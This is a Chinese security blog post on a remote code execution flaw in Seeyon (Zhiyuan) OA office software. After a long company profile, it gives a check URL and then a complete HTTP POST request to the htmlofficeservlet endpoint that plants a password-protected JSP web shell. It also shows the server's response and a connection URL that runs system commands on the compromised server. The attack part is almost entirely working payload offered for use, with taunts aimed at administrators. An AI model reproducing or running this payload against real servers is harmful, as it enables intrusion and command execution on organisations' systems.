WEB安全

致远 OA 办公自动化软件 0day 之横空出世

                             网络安全即是国家安全,积极响应国家号召,参与净网行动

0x00:简介

这三个月参与2019检查,不知道碰到多少seeyou

mmp 用seeyou的管理员们颤抖吧

 

用友致远软件技术有限公司(UFIDA Seeyon Software Technology Co.,LTD.)董事长徐石。用友致远软件技术有限公司是由中国最大的管理软件、ERP和财务软件供应商——用友软件股份有限公司投资并发起成立的专注于协同管理软件领域,集产品研发、市场拓展、渠道销售、技术支持等为一体的中国协同管理软件开发商和服务提供商。自2002年3月成立以来,用友致远依托互联网时代组织行为协同管理需求的旺盛增长,坚持产品化和大规模交付,坚持以伙伴发展为根基,以实现客户价值为目的,持续创新,务实发展,取得了快速的成长和巨大的进步,2005年至2014年,致远软件连续十年位居中国协同管理软件市场占有率第一(CCID),已经成为中国协同软件市场的领导者和第一品牌。用友致远协同管理软件精准定位于企事业组织行为管理的需求,融入先进的协同管理理念,运用领先的网络技术,是基于互联网的组织行为管理平台。用友致远协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、管理规范、资源整合、运营管控等难题,是组织管理的最佳实践。用友致远有A6和A8两大协同软件产品线:A6协同管理软件以其成熟稳定、“易用、好用、适用”的产品特性被业界誉为“协同经典”,目前已有6000多家国内外大中型企业、政府机关及法人社团等组织,超过100家上市公司,逾100万客户端每天都在使用用友致远的A6协同管理软件,以提升组织效率。而2007年底发布的A8协同管理软件,以强力支持集团化、多语言和跨平台应用为特点,被业界誉为“中国协同应用软件的新标准”,面世以来,已经得到包括昆明中铁、广东物资集团等在内的数十家大型企业集团的成功验证。用友致远的成就也赢得了市场和业界的广泛认可:2004年-2008年连续四年荣获中国电子行业用户满意单位、用户满意产品和用户满意服务单位等殊荣;2005、2006年度中国计算机用户协会“中国信息产业行业采购协同办公软件首选品牌”;2005年-2014年,致远软件连续十年位居中国协同管理软件市场占有率第一; 用友致远的协同管理软件已成为中国用户首选协同产品品牌,消费者首选率达28.34%。用友致远拥有规范的实施体系、完善的服务保障体系、先进的服务技术平台和多样的服务支持方式,逾800家合作伙伴服务网络有效覆盖全国,通过400-700-8822电话、专业的知识库等为客户提供“实时、高效、专业”的一流标准化服务,保障客户应用,相伴客户成长!

官网:http://www.seeyon.com

用友致远OA系列的产品有:致远M1移动协同软件、致远A8协同管理软件、致远A6协同管理软件、致远A3协同管理软件、致远A6-m协同管理软件等。

0x01:验证方式

此POC/RCE来自圈子社区

一、POC验证

漏洞情况:

访问

/seeyon/htmlofficeservlet

出现

DBSTEP V3.0     0               21              0               htmoffice operate err

证明了漏洞的存在

二、RCE验证

POST包:

POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xxxxxxxxx
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

响应包:
DBSTEP V3.0     386             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLCXqUKAP7uhw4g5zi=6
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>


getshell 连接

http://******/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd +/c+whoami
(2)

本文由 SAFEING 信息安全博客 作者:root 发表,转载请注明来源!

                             网络安全即是国家安全,积极响应国家号召,参与净网行动

热评文章

发表评论

电子邮件地址不会被公开。